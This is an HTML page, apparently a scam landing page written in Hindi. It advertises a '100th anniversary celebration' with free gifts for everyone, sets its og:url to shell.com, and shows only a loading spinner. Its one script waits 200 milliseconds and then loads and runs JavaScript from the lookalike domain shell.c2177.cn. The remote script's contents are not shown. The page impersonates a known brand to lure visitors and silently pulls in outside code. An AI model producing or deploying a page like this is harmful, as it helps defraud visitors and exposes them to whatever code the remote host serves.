
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link id="favicon" rel="shortcut icon" href="">
<meta property="og:image" content="/img/logo.jpg">
<meta property="og:title" content="👍 100 वीं सालगिरह का जश्न 🔥">
<title>👍 100 वीं सालगिरह का जश्न 🔥</title>
<meta property="og:type" content="article">
<meta property="og:description" content="सभी को मुफ्त उपहार मिल सकते हैं">
<meta property="og:url" content="https://www.shell.com">
<link rel="icon" href="data:image/ico;base64,aWNv">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="robots" content="noindex, follow">
<style>
    .loader { position: relative; width: 2.5em; height: 2.5em; transform: rotate(165deg); }
    .loader:before, .loader:after { content: ""; position: absolute; top: 50%; left: 50%; display: block; width: 0.5em; height: 0.5em; border-radius: 0.25em; transform: translate(-50%, -50%); }
    .loader:before { animation: before 2s infinite; }
    .loader:after { animation: after 2s infinite; }
    @keyframes before {
        0% { width: 0.5em; box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); }
        35% { width: 2.5em; box-shadow: 0 -0.5em rgba(225, 20, 98, 0.75), 0 0.5em rgba(111, 202, 220, 0.75); }
        70% { width: 0.5em; box-shadow: -1em -0.5em rgba(225, 20, 98, 0.75), 1em 0.5em rgba(111, 202, 220, 0.75); }
        100% { box-shadow: 1em -0.5em rgba(225, 20, 98, 0.75), -1em 0.5em rgba(111, 202, 220, 0.75); }
    }
    @keyframes after {
        0% { height: 0.5em; box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); }
        35% { height: 2.5em; box-shadow: 0.5em 0 rgba(61, 184, 143, 0.75), -0.5em 0 rgba(233, 169, 32, 0.75); }
        70% { height: 0.5em; box-shadow: 0.5em -1em rgba(61, 184, 143, 0.75), -0.5em 1em rgba(233, 169, 32, 0.75); }
        100% { box-shadow: 0.5em 1em rgba(61, 184, 143, 0.75), -0.5em -1em rgba(233, 169, 32, 0.75); }
    }
    /**
     * Attempt to center the whole thing!
     */
    html, body { height: 100%; }
    .loader { position: absolute; top: calc(50% - 1.25em); left: calc(50% - 1.25em); }
</style>
</head>
<body>
<div class="loader"></div>
<script type="text/javascript" charset="utf-8">
    function loadScript(url, callback){
        var script = document.createElement ("script")
        script.type = "text/javascript";
        if (script.readyState){
            script.onreadystatechange = function(){
                if (script.readyState == "loaded" || script.readyState == "complete"){
                    script.onreadystatechange = null;
                    callback();
                }
            };
        } else {
            script.onload = function(){
                callback();
            };
        }
        script.src = url;
        document.getElementsByTagName("head")[0].appendChild(script);
    }
    setTimeout(function(){
        loadScript('//shell.c2177.cn/og.js?_=14d1dbdc71ba9550bdd99857e682c9a6',function(){});
    },200);
</script>
</body>
</html>